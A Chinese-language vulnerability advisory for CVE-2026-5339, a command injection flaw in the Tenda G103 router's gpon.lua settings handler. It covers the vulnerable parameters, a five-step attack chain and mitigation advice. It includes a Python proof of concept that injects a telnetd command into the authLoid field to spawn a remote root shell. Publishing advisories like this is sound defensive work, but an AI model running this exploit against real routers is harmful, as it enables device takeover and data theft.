CVE-2026-5339 Tenda G103命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-5339

漏洞类型

命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Tenda G103

漏洞概述

Tenda G103 1.0.0.5版本存在命令注入漏洞。该漏洞源于组件Setting Handler中的gpon.lua文件内的action_set_net_settings函数未能正确过滤用户输入。攻击者可利用authLoid、authPassword等参数注入恶意命令。虽然需要高权限才能触发，但攻击者可远程发起攻击，可能导致系统机密性、完整性和可用性受损。

技术细节

该漏洞位于Tenda G103路由器的Web管理接口中，具体影响文件为`gpon.lua`中的`action_set_net_settings`函数。在处理网络设置请求时，该函数直接获取了包括`authLoid`、`authLoidPassword`、`authPassword`、`authSerialNo`、`authType`、`oltType`、`usVlanId`及`usVlanPriority`在内的多个参数，且未进行严格的输入验证或过滤。由于这些参数被直接拼接到底层系统命令中执行，攻击者可以通过构造特制的HTTP请求，在上述参数中注入Shell元字符（如`;`、`|`、`&`等）。尽管CVSS评分要求攻击者拥有高权限（PR:H），但一旦具备访问权限，即可通过远程网络向量（AV:N）执行任意系统命令，从而完全控制受影响设备的操作系统。

攻击链分析

STEP 1

1. 侦察阶段

攻击者扫描网络，识别目标设备为Tenda G103，并确认其固件版本为1.0.0.5。

STEP 2

2. 获取访问权限

由于漏洞需要高权限（PR:H），攻击者通过暴力破解或利用其他凭据泄露获取路由器Web管理界面的管理员登录凭证。

STEP 3

3. 漏洞利用

攻击者构造包含恶意Shell命令的HTTP POST请求，针对`/goform/action_set_net_settings`接口，将Payload注入到`authLoid`等参数中。

STEP 4

4. 命令执行

服务器端`gpon.lua`脚本未过滤参数，直接将恶意数据拼接至系统命令并执行，导致攻击者在设备后台运行任意命令。

STEP 5

5. 建立持久化与控制

攻击者利用执行的命令开启Telnet服务或下载后门程序，获取设备的完整控制权，并窃取数据或破坏系统功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_ip = "192.168.0.1"
url = f"http://{target_ip}/goform/action_set_net_settings"

# Vulnerable parameters list: authLoid, authLoidPassword, authPassword, etc.
# Example payload to execute a command (e.g., reboot or telnet)
command_payload = "; telnetd -p 2323 -l /bin/sh"

# Data payload exploiting the 'authLoid' parameter
payload_data = {
    "authLoid": command_payload,
    "authLoidPassword": "admin",
    "authPassword": "admin",
    "authSerialNo": "123456",
    "authType": "1",
    "oltType": "1",
    "usVlanId": "100",
    "usVlanPriority": "0"
}

try:
    # Sending the malicious POST request
    response = requests.post(url, data=payload_data)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Error occurred: {e}")

影响范围

Tenda G103 1.0.0.5

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议用户通过ACL（访问控制列表）严格限制对路由器管理端口（通常为80或443）的访问来源，仅允许可信的内部IP地址连接。此外，应密切监控设备的CPU使用率和网络流量，一旦发现异常的进程或对外连接，应立即重启设备并断开网络连接进行排查。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5339
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5339
3 Details https://www.cvedetails.com/cve/CVE-2026-5339/
4 VulDB https://vuldb.com/cve/CVE-2026-5339
5 Link https://github.com/ZZ2266/.github.io/tree/main/Tenda%20G103/authLoid
6 Link https://vuldb.com/submit/781132
7 Link https://vuldb.com/submit/781133
8 Link https://vuldb.com/submit/781134
9 Link https://vuldb.com/submit/781135
10 Link https://vuldb.com/submit/781142
11 Link https://vuldb.com/submit/781143
12 Link https://vuldb.com/submit/781144
13 Link https://vuldb.com/submit/781145
14 Link https://vuldb.com/vuln/354670